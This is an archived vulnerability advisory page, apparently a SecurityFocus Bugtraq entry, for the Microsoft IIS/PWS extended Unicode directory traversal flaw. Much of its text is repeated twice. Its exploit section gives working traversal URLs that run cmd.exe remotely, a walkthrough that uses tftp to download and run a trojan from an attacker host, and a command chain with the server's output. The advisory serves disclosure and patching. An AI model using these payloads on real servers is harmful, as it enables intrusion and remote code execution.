Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
BID:1806
Info
Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
| Bugtraq ID: | 1806 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Oct 17 2000 12:00AM |
| Updated: | Oct 17 2000 12:00AM |
| Credit: | Discovered by an anonymous poster to a Packetstorm forum. Additional research conducted by Rain Forest Puppy <[email protected]>. Publicized in a Microsoft Security Bulletin (MS00-078) on October 17, 2000. Microsoft Personal Web Server discovered and post |
| Vulnerable: |
Microsoft Personal Web Server 4.0 Microsoft IIS 5.0 Microsoft IIS 4.0 alpha Microsoft IIS 4.0 |
| Not Vulnerable: | |
Discussion
Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
This is the vulnerability exploited by the Code Blue Worm.
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
This is the vulnerability exploited by the Code Blue Worm.
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.
Exploit / POC
Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following examples were provided:
http://target/scripts/..%c1%1c../path/file.ext
Eg.
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/
cmd.exe?/c+dir
Zoa_Chien <[email protected]> describes the following exploits using TFTP or Samba in his post to Bugtraq:
By using tftp.exe that comes with NT and win2k by connecting and
downloading a trojan from a tftp daemon you can bypass these
restrictions. Install < ftp://ftp.cavebear.com/karl/tftpd32.zip >
and connect from your compromised to your local machine using the
command " tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe ".
You van do so wiith this url:
/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe
then all you have to do is run the trojan with:
/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe
You might also use the samba commands: "net share and net user"
on the target and "net use" on the local machine... but this does
not always seem to work. (coz. netbios is not installed?)
In their post to Bugtraq, Nsfocus Security Team <[email protected]> describes how to execute commands using a redirect on the target host:
(1) copy "..\..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe"
http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe
IIS returned :
"CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are:
1 file(s) copied."
(2) run "cmd1.exe /c echo abc >aaa & dir & type aaa "
http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa
IIS returned :
" Directory of c:\inetpub\scripts
10/25/2000 03:48p <DIR> .
10/25/2000 03:48p <DIR> ..
10/25/2000 03:51p 6 aaa
12/07/1999 05:00a 236,304 cmd1.exe
..
abc
"
Optyx <[email protected]> has released the following exploits:
iis-zang.c
iis-zang.exe
iis-zang.obsd
iis-zang.linux
Roelof Temmingh <[email protected]> has released the following exploits:
unicodecheck.pl
unicodexecute.pl
unicodexecute2.pl
<[email protected]> has released the following exploit:
iisuni.c
BoloTron <[email protected]> has provided the following exploit:
iis-kabom.php
Gabriel Maggiotti <[email protected]> has provided the following exploit:
all_uniexp.c
This is the vulnerability exploited by the Code Blue Worm.
SPAX <[email protected]> has provided the following exploit:
IIS-PLUS.PL
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following examples were provided:
http://target/scripts/..%c1%1c../path/file.ext
Eg.
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/
cmd.exe?/c+dir
Zoa_Chien <[email protected]> describes the following exploits using TFTP or Samba in his post to Bugtraq:
By using tftp.exe that comes with NT and win2k by connecting and
downloading a trojan from a tftp daemon you can bypass these
restrictions. Install < ftp://ftp.cavebear.com/karl/tftpd32.zip >
and connect from your compromised to your local machine using the
command " tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe ".
You van do so wiith this url:
/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe
then all you have to do is run the trojan with:
/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe
You might also use the samba commands: "net share and net user"
on the target and "net use" on the local machine... but this does
not always seem to work. (coz. netbios is not installed?)
In their post to Bugtraq, Nsfocus Security Team <[email protected]> describes how to execute commands using a redirect on the target host:
(1) copy "..\..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe"
http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe
IIS returned :
"CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are:
1 file(s) copied."
(2) run "cmd1.exe /c echo abc >aaa & dir & type aaa "
http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa
IIS returned :
" Directory of c:\inetpub\scripts
10/25/2000 03:48p <DIR> .
10/25/2000 03:48p <DIR> ..
10/25/2000 03:51p 6 aaa
12/07/1999 05:00a 236,304 cmd1.exe
..
abc
"
Optyx <[email protected]> has released the following exploits:
iis-zang.c
iis-zang.exe
iis-zang.obsd
iis-zang.linux
Roelof Temmingh <[email protected]> has released the following exploits:
unicodecheck.pl
unicodexecute.pl
unicodexecute2.pl
<[email protected]> has released the following exploit:
iisuni.c
BoloTron <[email protected]> has provided the following exploit:
iis-kabom.php
Gabriel Maggiotti <[email protected]> has provided the following exploit:
all_uniexp.c
This is the vulnerability exploited by the Code Blue Worm.
SPAX <[email protected]> has provided the following exploit:
IIS-PLUS.PL
- /data/vulnerabilities/exploits/iis-zang.c
- /data/vulnerabilities/exploits/iis-zang.exe
- /data/vulnerabilities/exploits/iis-zang.obsd
- /data/vulnerabilities/exploits/iis-zang.linux
- /data/vulnerabilities/exploits/unicodecheck.pl
- /data/vulnerabilities/exploits/unicodexecute.pl
- /data/vulnerabilities/exploits/unicodexecute2.pl
- /data/vulnerabilities/exploits/iisuni.c
- /data/vulnerabilities/exploits/iis-kabom.php
- /data/vulnerabilities/exploits/all_uniexp.c
- /data/vulnerabilities/exploits/IIS-PLUS.PL
Solution / Fix
Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
Solution:
The patch released with the advisory MS00-057 (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp) eliminates this vulnerability, therefore those who have already applied this patch do not have to take any further action. Otherwise, the patch is available at the following locations:
Microsoft Personal Web Server 4.0
Microsoft IIS 4.0 alpha
Microsoft IIS 4.0
Microsoft IIS 5.0
Solution:
The patch released with the advisory MS00-057 (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp) eliminates this vulnerability, therefore those who have already applied this patch do not have to take any further action. Otherwise, the patch is available at the following locations:
Microsoft Personal Web Server 4.0
-
David Raitzer pws_patch.zip
http://www.geocities.com/p_w_server/pws_patch/index.htm
Microsoft IIS 4.0 alpha
-
Microsoft Q269862
http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/ EN-US/prmcan4a.exe -
Microsoft Q269862
http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/ EN-US/prmcan4as.exe
Microsoft IIS 4.0
-
Microsoft Q269862
http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/ EN-US/prmcan4i.exe -
Microsoft Q269862
http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/ EN-US/prmcan4is.exe
Microsoft IIS 5.0
References
Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
References:
References:
- F-Secure Computer Virus Information Pages: CodeBlue (F-Secure)
- Frequently Asked Questions: Microsoft Security Bulletin (MS00-078) (Microsoft)
- FW: ISSalert: ISS Alert: Code Blue Worm (VanMeter, John
- IIS UNICODE exploit (CORE Security)
- TROJ_BLUECODE.A (Trend Micro)